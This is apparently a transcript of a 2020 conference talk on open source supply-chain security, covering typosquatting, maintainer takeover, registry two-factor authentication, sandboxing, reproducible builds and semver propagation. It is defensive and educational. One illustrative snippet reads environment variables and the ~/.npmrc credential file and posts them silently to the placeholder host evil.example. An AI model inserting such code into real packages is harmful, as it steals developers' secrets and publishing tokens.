Thanks for joining. I'm Maurice Alkins from WhiteSource, and today I'm going to talk about unsolved problems in open source security.

One of the reasons I find open source security particularly interesting is that people often underestimate it. We often talk about the iceberg of modern software: above the surface, what's most obvious and visible to developers is the code they write. But under the surface is the open source code that so many projects depend on, and most measurements put it at between 60 and 90% of the code deployed in a typical project. This is the code that helps run your website, or runs its back end. What this means is that, perceptually, people can make the mistake of thinking that code someone else wrote is someone else's problem. The reality is that what you ship is your problem, so problems in the open source you use are your problems.

Now, people have had a tendency to try to ignore these problems. One of my favorite sayings is that the enemy always gets a vote. What this means, especially in open source security, is that you can choose to ignore some of these problems, but that choice doesn't mean you'll stay out of a fight. In particular, when problems with open source become public, the clock starts ticking. A problem in a library you use gets a public notification, and from that point, anybody with bad intentions can go looking for companies, websites and apps that use that software, and test whether it's exploitable. These two factors, the underestimation and the public nature of open source security, make this a particularly interesting topic.

What I want to do today is first talk about challenges in open source security that are actually fairly well solved, to get a baseline, before moving into topics that I consider deeply problematic and almost entirely unsolved, which we as an industry need to get on top of.

The first topic, mostly solved (nothing's ever perfect), is knowing what open source you are using. Think about dependency maturity levels. To some extent, what I've written here corresponds with time, you know, 10 years ago, 5 years ago, and so on, but all of these still exist in projects today. At the lowest maturity level: copy, paste, commit. This was perhaps the traditional way open source was used. People would publish code publicly, say you're allowed to use it, and you'd copy it into your project, commit it and use it. The next level up is build scripts that pull in the open source you need at build or compile time. We've matured a lot since then, and the leading approach now is package managers: things like Bundler, Maven, npm and so on. Here the package manifest becomes the key to defining what open source a project uses. The final level of maturity, which has become more popular in recent years, is lock files. With a manifest alone we're merely saying what direct dependencies we use; lock files let us freeze all direct and indirect dependencies (sometimes known as transitive dependencies), so that you get a repeatable open source build, at least in the sense that the same dependencies are installed every time.
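To make the manifest-versus-lock-file distinction concrete, here's a minimal npm-style manifest snippet; the package and version are just illustrative:

```json
{
  "dependencies": {
    "express": "^4.17.1"
  }
}
```

The caret range says "any 4.x at or above 4.17.1 is acceptable," so two installs on two different days can legitimately resolve to different versions. A lock file, by contrast, records the exact resolved version and an integrity hash for express and for every transitive dependency underneath it, which is what makes the install repeatable.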
So that's the range of maturity levels in open source dependency use. Then, if you're looking at how to detect what open source is used in a project, there are two approaches.

The first one I call face value. This is where you use some tool, script or service from a vendor, look for package manifest files or lock files, parse them, and then you essentially know what your project should be using. It's like reading the ingredients on a can of soup: it tells you what should be in there. In many cases this is sufficient. The ideal is that we have a lock file for a repeatable build, and we can use the lock file to determine exactly what's in our project.

For a lot of projects or companies, though, face value isn't good enough, and so the second approach, which I call the forensic approach, is to run your build scripts and fingerprint every file in the build and post-build directories. You pull in all the files you're using through your various processes and routines, and then compare all of those files against known open source files.

Those are the two approaches we have to determining what open source is in our projects, and it's really the fundamental building block, because if we don't know what's in our project, we can't know whether we have problems or not. There's an old saying about people not wanting to know how the sausage is made. Well, if you're in the business of making sausages, you need to know how it's made. If you make software that uses open source, you need to know what open source is in your project. Like I said, this is a mostly solved problem, but it's the base building block for everything else I'm going to talk about today.

The second mostly solved problem is being alerted when your open source has problems. Once you know what's in your project, the next step is being alerted when there actually is a problem. Automation here is essential. If you rely on manual processes to check whether you have open source security problems, they're going to be forgotten at times, and maybe, through bad luck, the most critical problem will arrive just after your last check and too long before your next one. The ideal system or service for open source vulnerabilities knows what you're using: continuous scans, based on a pipeline approach, that always know the latest open source in your code, or at least the open source in your latest code. It also knows what's vulnerable, via some kind of real-time feed or scraping of the vulnerability databases. And importantly, it correlates the two at all times. This is the modern approach to open source security; if you're in the software world, you've probably already received your first vulnerability notification from one or more such sources. So here we know what we're using, and we have confidence that we'll be alerted. These are problems that are pretty well solved so far, to different degrees depending on which software you use, but overall, as an industry, this is a topic we're fairly on top of.
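As a sketch of the face value approach, and of the correlation an alerting service performs, here's roughly what a tool might do with an npm v1-style package-lock.json (the nested "dependencies" format npm 5 and 6 produce; that format is the only assumption here):

```ts
// Face value detection: parse the lock file the package manager already
// produced and list every pinned dependency, direct and transitive.
import { readFileSync } from "fs";

interface LockEntry {
  version: string;
  dependencies?: Record<string, LockEntry>;
}

function collect(
  deps: Record<string, LockEntry> = {},
  out: Map<string, Set<string>>
): void {
  for (const [name, entry] of Object.entries(deps)) {
    if (!out.has(name)) out.set(name, new Set());
    out.get(name)!.add(entry.version);
    collect(entry.dependencies, out); // recurse into transitive dependencies
  }
}

const lock = JSON.parse(readFileSync("package-lock.json", "utf8"));
const found = new Map<string, Set<string>>();
collect(lock.dependencies, found);

for (const [name, versions] of found) {
  console.log(`${name}: ${[...versions].join(", ")}`);
}
```

An alerting service is essentially this list, continuously refreshed, joined against a real-time vulnerability feed.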
Once we know we have a problem, we then want to remediate it, and again this is mostly solved. So, remediating open source vulnerabilities. Here's the good news: at least as of 2019, when we at WhiteSource last checked, 85% of the time when vulnerabilities (or CVEs, as you may know them) were publicly disclosed in the NVD, there was already a fixed version available. That makes your job fairly simple: there's a problem, and the resolution is to update to a version that doesn't have it. Publicly disclosed vulnerabilities are usually the most serious, because they're the ones anybody with malicious intent can attempt to exploit. Most, like I said, have a fix already available at the time of publication, so remediation has become increasingly simple for these scenarios. It means: upgrade.

So now let's get into the unsolved problems in open source, and I'm going to call out identity and reputation as one of the big ones. There are of course attempts at it, and opinions on it, but realistically this is not something we as an industry have figured out.

First of all, it's really important to understand the difference between two types of problems: vulnerable packages and malicious packages. Your typical vulnerability is an accident or an oversight; someone has made a mistake. These are hopefully not easily exploitable. This is the type of vulnerability where somebody says: if an attacker can submit a specially crafted string, they may be able to cause an overload, a denial of service, or potentially a buffer overflow exploit. That's really what you'd call a vulnerability, and it accounts for most of what you'd be alerted about today. Malicious packages are different. Malicious packages in open source are more like the viruses or malware you might be used to on your computer: they intentionally do bad things, and often they do them immediately. Just like a virus, if you've got it, it's already too late. It's very important to understand the difference, because malicious packages, if you have them, carry the highest risk, compared to a vulnerability which may not even be exploitable.

Malicious packages come in two types. The first is a package that's truly bad from the start: it's published to a registry, which could be npm, Maven Central and so on, and from the very first day it was intended to be bad. Now, it would be pretty impressive for someone to write a library good enough that people start using it instead of existing alternatives, but which also has malicious code embedded, and that's normally not what happens. The best example of purely malicious packages is what we call typosquatting. If you have a common package like lodash, L-O-D-A-S-H, somebody might publish L-O-W-D-A-S-H and hope that people who don't know how lodash is spelled will misspell it and install theirs. The registries have been addressing this by actively monitoring for typosquats and removing them, so it's a reasonably easy one for registries to solve.
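As a rough sketch of the kind of check a registry might run, here's a toy detector; the popular-names list and the edit-distance threshold are purely illustrative:

```ts
// Classic Levenshtein edit distance between two package names.
function editDistance(a: string, b: string): number {
  const d = Array.from({ length: a.length + 1 }, (_, i) =>
    Array.from({ length: b.length + 1 }, (_, j) => (i === 0 ? j : j === 0 ? i : 0))
  );
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      d[i][j] = Math.min(
        d[i - 1][j] + 1, // deletion
        d[i][j - 1] + 1, // insertion
        d[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1) // substitution
      );
    }
  }
  return d[a.length][b.length];
}

const popular = ["lodash", "express", "react"];

// Flag names that are close to, but not identical to, a well-known package.
function looksLikeTyposquat(candidate: string): string | null {
  for (const name of popular) {
    const dist = editDistance(candidate, name);
    if (dist > 0 && dist <= 2) return name;
  }
  return null;
}

console.log(looksLikeTyposquat("lowdash")); // -> "lodash"
```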
The more dangerous type is a good package turned bad, and there are three main ways this has happened. The first is that maintainer credentials get compromised: it's a good package by a good maintainer, and somebody bad steals that maintainer's publishing credentials and then publishes a malicious version. The second is that a new maintainer takes over an existing good package with malicious intent. There are a lot of open source packages in the world where the author no longer has time to keep up with them, and there have been instances where somebody comes along and says: hey, I'm using this package, here are some fixes or some extra features, and the existing maintainer offers, or is asked, to add that person as a new maintainer, sometimes even to hand the package over. This is one of the key ways malicious packages get into people's software: you take a package that's already popular but essentially unmaintained, and somebody takes it over. The third way, which seems less likely but has happened, is a package creator playing a very long game: they create a package which is genuinely good at the time, with the intention to one day burn it and use it as an exploit.

In terms of identity concepts, identity is basically: who are you, and can you prove it? "Who are you" is in some ways one of the least useful questions we can ask in open source, because you don't need a license to publish open source, and merely knowing who someone is gives you no real surety about whether a package they're currently publishing will turn bad. "Can you prove it" is a far more useful question, because if we can be sure that packages claiming to be published by a certain identity really are, that lets us draw conclusions we couldn't draw if we can never be sure who's publishing.

With identity, I think it's important to look at risk and reward. Package compromises are mostly predictable: someone is generally looking to steal credentials and leverage them to steal more credentials or data. The risks, though, are quite variable. If the attack is just stealing the credentials of an existing maintainer, say via a reused password, you have very little to lose: pretty much the worst that happens is that the credentials get rotated and you can no longer publish malicious packages with them. So the attacker has a lot to gain and very little to lose. A malicious maintainer, on the other hand, is going to lose their account. If a long-term publisher with many packages turned out to be using them for bad, they would probably lose the ability to publish packages, or at least the industry would stop using anything they publish.

Focusing on two-factor authentication is by far the low-hanging fruit here, because if we can remove the stolen-credentials vector, we've removed the highest gain-for-risk ratio of all: just stealing someone's credentials. Two-factor authentication has challenges, though. One is that we have so many transitive dependencies in projects. JavaScript is the most well-known case, but it's not the only one; no matter the language, you're likely to have a lot of transitive dependencies.
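If you want to see the scale of that for yourself, here's a quick Node.js sketch, assuming a project with an installed node_modules directory, that counts the packages sitting on disk:

```ts
// Count every installed package under node_modules, including nested
// installs and scoped (@org/name) packages.
import { existsSync, readdirSync, statSync } from "fs";
import { join } from "path";

function countPackages(dir: string): number {
  if (!existsSync(dir)) return 0;
  let count = 0;
  for (const name of readdirSync(dir)) {
    const pkgDir = join(dir, name);
    if (!statSync(pkgDir).isDirectory()) continue;
    if (name.startsWith("@")) {
      count += countPackages(pkgDir); // scoped packages nest one level deeper
      continue;
    }
    if (existsSync(join(pkgDir, "package.json"))) count++;
    count += countPackages(join(pkgDir, "node_modules")); // nested installs
  }
  return count;
}

console.log(`${countPackages("node_modules")} packages installed`);
```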
Even in a large project you could have hundreds or thousands of total dependencies installed, and when it comes to stealing credentials, say by scanning the operating system or environment, only one of those packages needs to be compromised. You're only as strong as your weakest link.

The second challenge with two-factor authentication is publishing automation. The trend is to automate the publishing of new releases instead of having people prepare them manually, but this runs counter to the desire for two-factor authentication, because automated systems essentially can't fill in a second factor; that's the whole point of it. For example, just this month npm released a new type of token, the automation token. You can now create a token that is read-only, one that allows publication with two-factor authentication, or the middle option, automation. Essentially, this is a way to take a two-factor-authentication account and disable the second factor for the purposes of publishing. There is hopefully a positive trade-off there, because a lot of accounts that have two-factor authentication entirely disabled today will now be able to enable it in general, since they can disable it specifically for the token they use to publish. However, it still has the problem that if that token is leaked, an attacker can publish with it as well.

It is a solvable problem. Google, for example, maintains a lot of open source projects and wants to automate as much as possible, which makes sense. So they've come up with a service that combines two-factor authentication with automation: a two-step process of automatically publishing to what they call the Wombat Dressing Room, then having a human complete the two-factor authentication for the final publish to npm. They've also taken a number of steps to reduce the chances of it being exploited. This is something we need to work towards, combining two-factor authentication with automated publishing, but frankly it mostly requires work from the registries to provide a more convenient publishing workflow.

The next unsolved problem is malicious maintainers of open source software. Consider first the malicious package creator. This is a special kind of scenario: someone who develops a package with the intent to compromise it. It requires pretty high skill, because you can't just create any old package and have people use it; it takes real skill to come up with something people have a use for and will find and install. It also requires long-term planning. Surprisingly, though, this has happened, although you may not be surprised to hear it happened because of Bitcoin. One person did it quite cleverly, really. They created a JavaScript library which they knew would save time for people building cryptocurrency wallets, and sure enough, at least one cryptocurrency wallet adopted that library to save themselves time and shipped it as part of their production software. Then the same original author eventually added code that would attempt to extract enough information from people running the wallet to essentially steal the cryptocurrency. The headline was of a success, a plot that was foiled.
The reality was that people still did lose cryptocurrency, so it was somewhat of a successful attack. And this is a tough one, because here we have someone who, like I said, is willing to play the long game.

The second type I'll call the malicious package maintainer: this person didn't create the package, but they become a maintainer. The scenario is: contribute to an existing and, ideally, unmaintained package, for example one the creator no longer uses themselves but lots of other people still do. Step two, once you've contributed, get added as a maintainer. Step three, add the exploit to the package. Again, this has happened, and in multiple languages, I should say, not just JavaScript, but it's easy to reference JavaScript here because some of these cases were very high profile. There was a scenario where someone created a package maybe 10 years ago called event-stream, and it became very popular, but the creator hadn't used it for years and didn't really have the time or motive to maintain it. Eventually someone came along and fixed a bug or two, and the original creator was happy to let that person take over as maintainer. Soon after taking over, they added code to attempt to steal credentials, and a lot of people running this package were at risk. So this is another attack vector in open source where a package that was good becomes bad. It takes less work and less skill than creating a package from scratch, and the challenge is that even if you pick your packages carefully at the time you choose them, things can change later down the track.

Now let's talk a little about what I call security multipliers. Three questions here. First, why can malicious packages do so much harm once they're installed? Second, why are these exploits so hard to detect; why aren't we better at protecting against them? And third, why do exploits propagate so fast? The answers to all of these fall under this category of unsolved security problems in open source.

Alright, first unsolved problem: sandboxing and permissions. Ideally, open source packages should have fewer permissions by default. You're taking code that someone you don't know wrote, and as soon as it is loaded, and in some ecosystems potentially as soon as it is installed, it can completely exploit your system. Just like accidentally running a virus EXE on Windows, merely installing an npm package can be enough to be completely exploited. It varies a bit language by language, but in pretty much every language, packages can fully exploit a system once they're loaded. What's interesting is that very few packages actually need the ability to read from the file system, read from the environment, or connect to outside servers, but that's basically how every exploit so far has worked: they scan for something they shouldn't have access to, say keys and secrets on the local file system, and then send it somewhere else, to a remote server. The reality is that very few of the packages you use would ever need to do this.
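To make that concrete, here's a harmless sketch of the exfiltration pattern; evil.example is a placeholder host, and the point is that nothing in it needs any special rights, which is exactly the problem:

```ts
// The shape of essentially every known package exploit, defanged:
// read things the package has no business reading, then POST them
// to a server the attacker controls.
import { readFileSync } from "fs";
import { request } from "https";
import { homedir } from "os";
import { join } from "path";

let npmrc = "";
try {
  // registry publishing credentials often live here
  npmrc = readFileSync(join(homedir(), ".npmrc"), "utf8");
} catch {
  /* file may not exist */
}

const loot = JSON.stringify({ env: process.env, npmrc });

// Any postinstall script or imported module can open this connection
// today in Node.js; no permission prompt, no sandbox.
const req = request({ host: "evil.example", method: "POST", path: "/collect" });
req.on("error", () => { /* fail silently, as real exploits do */ });
req.end(loot);
```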
So let's take a look at the example of operating system malware, like I mentioned with Windows. Operating system malware is much less of a problem today than it used to be. Why is that? The answer is not that McAfee got better at virus scanning; it wasn't that we got better at detecting bad apps. The reason is that we changed to more of a zero-trust and sandboxing approach to applications. Apps by default get only permissions that are safe; any further permissions, such as accessing your files or your photos, need explicit approval, and the operating system stops them from accessing anything they're not approved for. Essentially, we didn't solve malware on operating systems by getting better at detecting it or blocking it in the instant. We changed the paradigm so that software only gets the permissions it needs, which makes it a lot harder for an app to access all your stuff, versus before, when apps had full access by default. We need to take inspiration from that for open source software as well.

I want to highlight a really interesting project here. There's a new project called Deno, whose motto is secure by default. Deno, by the way, was created by the original creator of Node.js, and with Deno he's taken an approach where both the application you write and the modules you import need to be granted permissions. For example, if you take the five-line example from Deno of creating a server and just run it, you get a permission exception: attempting to access the network is denied, because the program was run without the --allow-net flag. This is a really big difference from Node.js and pretty much every other language, because the idea is that it's secure by default: if you want network access, it must be specified. And if you look at the packages that have been used to exploit credentials and exfiltrate them to other systems, they have all used permissions they would normally have no need for.
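To make that concrete, here's roughly the five-line Deno server I mentioned, using the standard library of the time (the std version pin here is illustrative):

```ts
// Run: deno run server.ts              -> PermissionDenied: network access
// Run: deno run --allow-net server.ts  -> serves on port 8000
import { serve } from "https://deno.land/std@0.50.0/http/server.ts";

const s = serve({ port: 8000 });
console.log("http://localhost:8000/");
for await (const req of s) {
  req.respond({ body: "Hello World\n" });
}
```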
Next problem: detecting malicious updates. Again, I consider this unsolved, because so far we haven't really had any answer to the question: when a package goes from good to bad, how could we actually stop that before it gets into people's systems? Here's why malicious updates are missed, meaning the update where a package goes from being totally harmless to being harmful. First, we have too much open source code to review. Second, it's too hard to review even when we want to. And third, you can't actually be sure of what you're reviewing. Let's dig into these three points.

First: too much open source to review. The majority of software projects, your projects, yours and mine, don't have the time to carefully review every line of every piece of open source they use. This is pretty obvious to most people. Yet as an industry we seem driven by the assumption that surely someone has looked at it. Even though we know it's impractical for us to look at it, we assume that surely someone must have. This really is a fallacy. There's a saying from the Linux world, Linus's Law: given enough eyeballs, all bugs are shallow. But we really have to ask: are the eyeballs even looking at the releases? The reality is that the majority of open source releases are probably not looked at by anybody except the person who wrote them.

So what are our possibilities here? One is a business opportunity for security as a service: maybe there's a company that will review every line of code before you update. The second, maybe more industry-based, is crowd security: is there a way that if someone has reviewed a release, we can know about it, and if nobody has, we can know that too? The challenge there, though, comes back to identity: who do you trust? Because someone clever enough to take over a package, or create one, and publish it is probably clever enough to have a few other accounts that claim to have reviewed it. There's no easy answer to this challenge of having too much to review.

So let's say we are reviewing: an open source update from version 1.0 to version 1.1. It's actually very inconvenient to review today. The main reason is that source control platforms are designed for reviewing your code, not someone else's code that you've imported. With package managers and package manifests, a pull request that says "update dependency from 1.0.0 to 1.1.0" can literally be a one-line diff. That tells you nothing about what actually changed. Reviewing what actually changed typically requires going into some other system, like Maven Central, that sort of thing: leaving your code review and going somewhere else. And unfortunately no major open source registry supports native diffing of packages. You go there and say, okay, I want to know what changed from 1.0.0 to 1.1.0, and most of them have no diffing built in. Further compounding the problem, and maybe partly why they don't offer a diff, is that for many languages what the registries contain are artifacts: built, post-build code. That might be JAR files, or, even in an interpreted language like JavaScript, output compiled by Babel or from TypeScript.

So let's say you do take the time to review: you look up where the package lives and you go to read the source code. The problem is that the source you're looking at may not be the real source of the registry artifact you're consuming. Faced with the challenge of comparing post-compiled code, you might say, fine, I'll look at the source code; that's what I'm interested in. The good news is that most open source code today is on GitHub, so we don't have to go hunting far. The bad news is that a malicious maintainer is most likely not going to put the malicious part of their code on GitHub anyway. With the exception of Docker Hub, which has an option called an automated build where you give it a Dockerfile and it builds the image for you, no major registry, not npm, not PyPI, and so on, enforces or verifies the link between source and artifact. This means that as a malicious maintainer, and we've already established I'm perhaps pretty clever, I can publish one thing to GitHub and another thing to the registry. The registry won't identify that, or flag to anybody that the source doesn't match the artifact, because none of these registries verify that it does. This is a huge problem, because even if you had the time, and considered the risk high enough, it's very, very hard to actually know what it is you should be looking at.
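One practical workaround is to diff the published artifacts themselves, rather than trusting GitHub, since the tarballs are what you actually run. A sketch, with placeholder package names, assuming npm plus standard Unix tar and diff are available:

```ts
// Download the actual published tarballs for two versions and compare them,
// which is the diff registries don't provide natively.
import { execSync } from "child_process";
import { mkdtempSync } from "fs";
import { tmpdir } from "os";
import { join } from "path";

function fetchAndUnpack(spec: string): string {
  const dir = mkdtempSync(join(tmpdir(), "pkg-"));
  // `npm pack` downloads the exact artifact the registry serves and
  // prints the tarball filename on its last line of output
  const out = execSync(`npm pack ${spec}`, { cwd: dir }).toString().trim();
  const tarball = out.split("\n").pop()!;
  execSync(`tar -xzf ${tarball}`, { cwd: dir });
  return join(dir, "package"); // npm tarballs unpack to package/
}

const oldDir = fetchAndUnpack("some-package@1.0.0");
const newDir = fetchAndUnpack("some-package@1.1.0");

// diff exits non-zero when files differ, so don't let execSync throw
try {
  execSync(`diff -ru ${oldDir} ${newDir}`, { stdio: "inherit" });
} catch {
  /* differences were printed above */
}
```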
So if your whole purpose in looking at the code is to worry about malicious code, unfortunately looking on GitHub isn't really going to help. There is one movement in the industry that I think is fantastic, and that is most of the solution to this problem: reproducible builds. The idea of reproducible builds is ensuring the verifiability of source code, and it's a very big missing link in open source security. What's interesting is that it doesn't really require extra work, at least once the tooling is finished, and it greatly decreases security risk for everyone involved, including open source developers. The idea is that if you take the source code for a package or an application, you can build it yourself and verify, byte for byte, that it produces the exact same artifact, the same post-build result, that the publisher says it does.

This is great for security for even more reasons than you'd think. First, it allows you, or registries for that matter, to verify that a package matches its source. Today, if you take a package from npm or Maven Central, go to its source, build it yourself, and the result doesn't match the registry's bytes exactly, that's really not much of an indication that something is wrong. Unfortunately, that's just how a lot of builds work, which means you can't reliably use a mismatch between artifact and source to gauge the probability that something is wrong. With reproducible builds, when a library or application is published, going from reproducible to non-reproducible is a big red flag, and you might, for example, even block it outright.

One of the other really good benefits of reproducible builds is that they make all of us safer. Say I'm a package author and I publish to a registry, and then you consume my package. An attacker could try to exploit the registry, or me, or, say, GitHub or AWS if I'm using them for my builds. If they can exploit my system, or the system I build on, or the system the code is hosted on, any of those works: the attacker has managed to get the code they want into software that others will consume. It also means that if I'm the author of a popular open source package, there's a target on my back, because if somebody can hack me, they can potentially use that to hack more important people and projects that use my software. In a world of reproducible builds, where source code that doesn't match published code gets flagged, the incentive to hack me is greatly diminished, because the attacker would have to put the malicious code onto GitHub, in public, as well. So this is a really great thing, and if you think it sounds great too, I recommend you put "reproducible builds" into Google and check that project out.
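The check itself is tiny. A sketch, where the two file paths are hypothetical: one artifact you built locally from the tagged source, one you downloaded from the registry:

```ts
// Reproducible builds in one comparison: byte-for-byte equality of hashes
// means the published package really came from the published source.
import { createHash } from "crypto";
import { readFileSync } from "fs";

function sha256(path: string): string {
  return createHash("sha256").update(readFileSync(path)).digest("hex");
}

const local = sha256("dist/mylib-1.1.0.tgz");          // built yourself from the tag
const published = sha256("downloads/mylib-1.1.0.tgz"); // fetched from the registry

if (local === published) {
  console.log("reproducible: source and artifact match");
} else {
  console.log("MISMATCH: in a reproducible-builds world, this is a red flag");
}
```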
I'm calling this next one undecided rather than unsolved: decentralized versus centralized registries. I bring this up because when people think about community and open source, the idea of fully decentralized, sort of democratic package publishing is generally thought of as good, versus having companies that control the registries, controlling the commons. For example, when the company npm was running the npm registry, there was certainly potential for conflicts of interest, because they needed to be profitable. People then have an instinct to think that decentralizing is the answer, but it's important to understand that, all other things being equal, a decentralized approach to package management and publishing makes security much worse. If you look at any of the known malicious packages from the past five years, and there have been cases in Python, Ruby and JavaScript, pretty much every time, the first articles written about the incident want to talk about how long it took for the package to get taken down from the registry. There's an implied community expectation that those who run the registry will take a malicious package down almost the instant someone reports it, and ideally even have processes in place to have caught it and to catch it next time. All of this takes a lot of money. It also takes centralized power: a centralized block or revocation of a package can't be done if no one is in control. Direct git-based dependencies do have some advantages here. In that scenario, instead of publishing a module to a registry, you basically tag it on GitHub and tell people to install it directly from there. The advantage is that the source is verifiable, like I was talking about earlier: what you see on GitHub is what you download. You've also got the advantage that the most common hosts, GitHub, GitLab and Bitbucket, are pretty likely to take down malicious code eventually, at least once it's reported to them; they're not in the business of hosting malicious code. In general, I think the push and pull between decentralized and centralized needs to be thought about in the context of security, because a fully decentralized system, from a security point of view, can be the wild west unless you add some further overlay on top.

So, back to unsolved problems: malicious package propagation. Looking at the malicious packages we've known about in the past, why did they propagate so fast? How did we end up with hundreds or thousands of people infected within hours? The reason malicious code propagates so fast is pretty much one word: semver, semantic versioning. Or more precisely, the way most people use semantic versioning is what contributes to it. Semver itself is pretty simple, and a good thing up front: for releases numbered x.y.z, all releases with the same x should be compatible, so 1.0 is compatible with 1.9, and so on. The problem is that the majority of package managers, npm, Bundler, Maven and so on, take an optimistic approach to version ranges. What this means is that given the opportunity, like a fresh install, they will always install the latest compatible version within the range you specify. So in the semver world you might say: I'm installing version 1.2.0 right now, but I'll specify my range as >=1.2.0 <2.0.0 so that I can get the latest compatible version. What this means is that any time a new release comes out, whether it's good or bad, there's a chance you'll get it.
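To see that optimistic behavior concretely, here's a sketch using the npm semver package, the same library npm itself uses to evaluate ranges:

```ts
// How optimistic ranges behave under semver.
import * as semver from "semver";

const range = "^1.2.0"; // caret shorthand for >=1.2.0 <2.0.0

console.log(semver.satisfies("1.2.0", range)); // true: the version you tested
console.log(semver.satisfies("1.9.3", range)); // true: a future release you never saw
console.log(semver.satisfies("2.0.0", range)); // false: major bump excluded

// On a fresh install, the resolver picks the *highest* satisfying version,
// so a brand-new (possibly malicious) 1.9.3 wins over the 1.2.0 you tested.
console.log(semver.maxSatisfying(["1.2.0", "1.5.1", "1.9.3"], range)); // "1.9.3"
```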
Now, lock files certainly help here, because unless the lock file changes, what you install won't change. But the reality is that lock files need to be frequently unlocked: at any time when you need to install something new, or update something within the lock file, other packages can be implicitly upgraded. So the lock file is not the answer here, unless you never, ever update, which isn't really feasible either.

Take an example with semver. Say your code depends on a package called red, at exactly version 1.0.0. You've got one dependency, you've given the exact version, and it seems pretty locked down. But red might depend on a package called blue at 2.x, and blue can depend on a package called orange at 3.x. So without you changing your dependencies, you could still be using red 1.0.0, and yet a new malicious version of orange could be installed. Additionally, say you start a new project, a new package, and you install red 1.0.0: at that point you'll get the latest version of orange, so you get the malicious version, for example. This is how the combination of semver ranges and transitive dependencies can lead to people getting malicious versions installed. In most of the past cases where people installed, and were potentially exploited by, malicious packages, they weren't using the malicious package directly at all; they were using it indirectly through other packages. Orange was the bad package.

My conclusion here is that uncapped version ranges should be considered an anti-pattern from a security point of view. By uncapped I mean: any new version within the range is considered compatible, so you should use it. Whatever future 1.x is published, it's probably good, so take it. So what are the alternatives to uncapped ranges? The first is to cap version ranges. Instead of saying 1.x, or a caret range like ^1.0.0, you specify an upper bound: >=1.0.0 <=1.4.0. What this means is that when version 1.5.0 comes out, you won't automatically take it until you update that range, test it and verify it. But again, like with two-factor authentication earlier, the challenge is that you're only as strong as your weakest link, and with all these transitive dependencies, every package in your package tree would need to do this.

Another alternative is to change the algorithm completely, and that alternative is called minimal version selection. Go modules essentially pioneered this, from my point of view. Now, Go modules actually still relies completely on semver, but when I said earlier that semver is the problem, it's not semver itself; it's the way we use semver. In Go modules, first of all, there's no need to declare ranges. There's no need to say 1.x, because we already know compatibility with 1.0.0 should mean compatibility with 1.x, so there's no need to state that explicitly. The key difference with Go modules and minimal version selection is that you don't use any newer version than you need to. Installed versions correspond to the minimum compatible version, not the latest compatible version as we've generally done with npm, Bundler and so on. What this means is that a malicious release is never propagated automatically, because if the new release isn't the minimum version, it doesn't get selected until someone who depends on it explicitly says: I need that version as the minimum. This is very important, because it means that automatic propagation is essentially stopped in the Go modules ecosystem.
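Here's a toy sketch of the difference, using the npm semver package for comparisons; the version lists are hypothetical:

```ts
// A toy version of minimal version selection (MVS): every consumer states
// the *minimum* version it needs, and the resolver picks the highest of
// those minimums, never a newer release that nobody asked for.
import * as semver from "semver";

// Hypothetical requirements on "orange" from around the dependency tree
const minimumsRequested = ["3.0.0", "3.2.0", "3.1.0"];
// All published versions; 3.3.0 was just released, possibly malicious
const published = ["3.0.0", "3.1.0", "3.2.0", "3.3.0"];

// MVS: the maximum of the requested minimums
const selected = minimumsRequested.sort(semver.compare).pop()!;
console.log(selected); // "3.2.0": 3.3.0 exists, but nobody asked for it

// Contrast with the optimistic resolution npm/Bundler do for a range
console.log(semver.maxSatisfying(published, "^3.0.0")); // "3.3.0"
```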
So in terms of version selection, one way forward for a more secure open source ecosystem would be to use capped ranges and bump them regularly. This is achievable with automation tools, but it's noisy from a project point of view: if you're continually bumping capped ranges as a library author, 90% of the commits to your master branch might be from whatever bot is doing it. The other alternative would be to use minimal version selection and only bump dependencies when necessary. What this does mean is that the long-held idea that semver gives you automatic bug fixes goes away, because you're no longer automatically getting the latest versions. If there are bug fixes, or potentially features, that you need from your dependencies, you have to explicitly specify the minimum version of that package that people should install when they install yours. Those are really the two possible ways forward.

So, wrapping up the key points and takeaways from unsolved problems in open source security. First, we need better open source publishing protection. Single-factor authentication is unacceptable. Registries should ideally allow enforcing two-factor authentication for publishing, and consumers of open source should be able to elect to use only dependencies that enforce two-factor authentication. This basically takes simple credential theft off the table. What does this need? It needs registry support: across the industry, whether it's JavaScript, Java, Python, PHP and so on, each registry needs to implement this separately. It also really needs consumer pressure. It requires us to make sure registries and package publishers understand that this matters to consumers. Just as publishing code with no tests should be considered a code smell, publishing without two-factor authentication should be too.

Number two, verifiable source code using reproducible builds. There's no point reviewing code for maliciousness if we're scanning the wrong code to begin with. Again, a non-reproducible build should be considered a code smell, like the lack of two-factor authentication. What this means is that published packages should be verifiable, both in terms of who published them and what source code they came from. This needs industry support for tooling, and the Reproducible Builds project is doing a great job there. It also needs adoption of the reproducibility mindset. I really don't hear many people talking about this; it definitely doesn't have industry mindshare yet, but from a security point of view it's one of the most important things we can do.

Number three, a big one: open source dependencies should be sandboxed. Today's approach to malicious open source packages can be compared to Windows 95 before the malware tsunami hit. Unfortunately, there's not much relief in sight from the language ecosystems. This is going to require, at least I think so, pretty big work from each language to support the idea that code you import into your software should have zero trust by default. Unfortunately that needs large re-architecting of language package imports, and apart from Deno, I haven't seen much of a push for it, even though it's such a great idea.
And then finally, I believe package managers should implement minimal version selection beyond just Go modules. It's really madness, our madness, that a malicious package release can be installed accidentally, essentially seconds after it's published, without anybody reviewing it. In the example from before, somebody publishes a malicious version of orange, and five seconds later somebody runs npm install red@1.0.0 and already has the malicious version of orange. No one's even reviewed or looked at it. This is not a great situation at all, and the faster things propagate, the worse it gets; that's where we are in 2020. So minimal version selection should be a configurable option for package ecosystems. I think this will take a while, it's not easy, and there may be some gremlins lurking in it, but more languages beyond Go need support for minimal version selection. This needs, first, package manager support, and second, frankly, awareness that right now we're trading security for convenience.

Alright, thank you very much. If you've lasted this long, I'm very thankful and in awe. If you have any questions or thoughts about today's topics and haven't entered them in the chat already, please do so now. I'll be hanging around for a while, but otherwise you can find me on Twitter and GitLab with the handle @Rackens, and I'd be happy to chat with you about any of these topics. Thanks very much.